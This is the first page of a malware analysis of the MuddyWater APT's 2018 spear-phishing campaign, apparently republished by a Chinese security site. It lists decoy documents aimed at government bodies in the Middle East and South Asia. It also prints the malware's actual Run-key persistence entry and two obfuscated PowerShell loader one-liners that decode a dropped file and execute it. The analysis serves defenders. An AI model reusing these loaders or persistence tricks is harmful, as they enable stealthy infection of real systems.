未加星标

MuddyWater expands operations

字体大小 | |
[网络安全 所属分类 网络安全 | 发布者 店小二04 | 时间 2018 | 作者 红领巾 ] 0人收藏点击收藏
Summary

MuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi Arabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large amount of spear phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia, other victims were also detected in Mali, Austria, Russia, Iran and Bahrain.. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still ongoing.

The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Decoy images by country Jordan
MuddyWater expands operations
The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc Turkey
MuddyWater expands operations
Turkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety
MuddyWater expands operations
Turkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc) Saudi Arabia
MuddyWater expands operations

Document signed by the Major General Pilot, commander of the Saudi Royal Air Force


MuddyWater expands operations
KSA King Saud University (KSU) KSA King Saud University (KSU) Azerbaijan
MuddyWater expands operations

nkiaf üün grü.doc (meeting for development)

Iraq
MuddyWater expands operations
Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers Pakistan
MuddyWater expands operations
ECP.doc National Assembly of Pakistan.doc
MuddyWater expands operations
P.Police.doc Afghanistan
MuddyWater expands operations

President.doc, E-government of Afghanistan

Technical details

Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware.

The initial infection vector

The initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to hinder static analysis.


MuddyWater expands operations

Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box .

The macro payload analysis, dropped files and registry keys

The macro payload, which is Base64 encoded, does the following:

Drops two or three files into the “ ProgramData ” folder. The dropped files are either in the root of the “ ProgramData ” folder or in a subdirectory. The file names may vary from one version of the malware to another.

\EventManager.dll

\EventManager.logs

\windowsDefenderService.ini l

Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some cases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in. The registry keys and executables may vary from one version of the malware to another.

Name: WindowsDefenderUpdater

Type:REG_EXPAND_SZ

Data:c:\windows\system32\ rundll32 .exe advpack.dll,LaunchINFSection C:\ProgramData\ EventManager.logs ,Defender,1,

The next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for bypassing whitelisting solutions since they are all from Microsoft and very likely whitelisted. Regardless of the file extensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.

Case 1: INF, SCT and text files dropped by the macro INF is launched via the advpack.dll “ LaunchINFSection ” function. INF registers the SCT file (scriptlet file) via scrobj.dll ( Microsoft Scriptlet library ). Via WMI ( winmgmt ), the javascript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file. powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join(”,$d));

PowerShell one-liner


MuddyWater expands operations

Encoded text file

Execution flow:


MuddyWater expands operations
Case 2: VBS and text files dropped by the macro

The VBS file decodes itself and calls mshta.exe , passing on one line of VBScript code to it, which in turn spawns a PowerShell one-liner which finally consumes the text file (usually Base64-encoded text).

powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));

PowerShell one-liner

本文网络安全相关术语:网络安全工程师 网络信息安全 网络安全技术 网络安全知识

tags: The,macro,files,text,file,doc,Turkey
分页:12
转载请注明
本文标题:MuddyWater expands operations
本站链接:https://www.codesec.net/view/603938.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 网络安全 | 评论(0) | 阅读(12)